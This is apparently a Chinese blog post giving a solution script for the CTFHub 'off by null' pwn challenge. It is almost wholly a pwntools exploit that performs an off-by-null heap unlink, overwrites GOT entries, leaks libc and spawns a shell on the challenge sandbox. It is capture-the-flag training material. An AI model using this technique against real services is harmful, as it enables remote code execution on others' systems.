CTFHub技能树-----pwn off by null

该代码展示了如何利用Python的pwn库来针对一个具有特定漏洞的远程服务执行一个缓冲区溢出攻击。首先,它通过添加、编辑和释放内存块来构造一个漏洞利用链,然后篡改puts函数的GOT表项以控制程序流,最终获取system地址并执行/bin/sh来获得shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-c1de9e72dce05941.sandbox.ctfhub.com",26940)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

def add(size):
	io.recvuntil(b"Choice:")
	io.sendline(b"1")
	io.recvuntil(b"Size: ")
	io.sendline(str(size))


def edit(idx,data):
	io.recvuntil(b"Choice:")
	io.sendline(b"2")
	io.recvuntil(b"Index: ")
	io.sendline(str(idx))
	io.recvuntil(b"Content: ")
	io.sendline(data)


def free(idx):
	io.recvuntil(b"Choice:")
	io.sendline(b"3")
	io.recvuntil(b"Index: ")
	io.sendline(str(idx))

fake_chunk = 0x602140
fake_fd = fake_chunk-0x18
fake_bk = fake_chunk-0x10

add(0x88)
add(0x4f8)
add(0x80)
payload = p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b"a"*(0x80-4*8)
payload += p64(0x80)
edit(0,payload)
free(1)

puts_plt = b"\xB0\x06\x40\x00\x00"
puts_got = elf.got['puts']
free_got = elf.got['free']
edit(0,p64(0)*3+p64(free_got)+p64(puts_got))
edit(0,puts_plt)
edit(2,p64(puts_got))
free(1)

puts_addr = u64(io.recv(6).ljust(8,b"\x00"))
libc_addr = puts_addr-libc.sym['puts']
system_addr = libc_addr+libc.sym['system']
print("puts_addr----------->: ",hex(puts_addr))
print("libc_addr----------->: ",hex(libc_addr))
print(p64(system_addr)[0:7])


edit(0,p64(system_addr)[0:7])
edit(2,b"/bin/sh\x00")
free(2)




io.interactive()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值